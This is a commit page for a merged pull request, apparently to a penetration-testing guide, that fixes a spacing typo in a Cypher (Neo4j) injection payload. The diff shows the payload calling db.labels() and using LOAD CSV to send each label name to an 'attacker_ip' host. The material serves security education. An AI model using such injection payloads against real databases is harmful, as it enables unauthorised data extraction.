Merge pull request #631 from NaxnN/patch-2

fix a missing space in a cypher-injection payload
This commit is contained in:
Carlos Polop 2023-05-26 11:28:45 +02:00 committed by GitHub
commit efccd3f03f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -125,7 +125,7 @@ Using the built-in method **`db.labels`**, it is possible to list all existing l
{% code overflow="wrap" %}
```sql
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip/?l='+label as l RETURN 0 as _0
```
{% endcode %}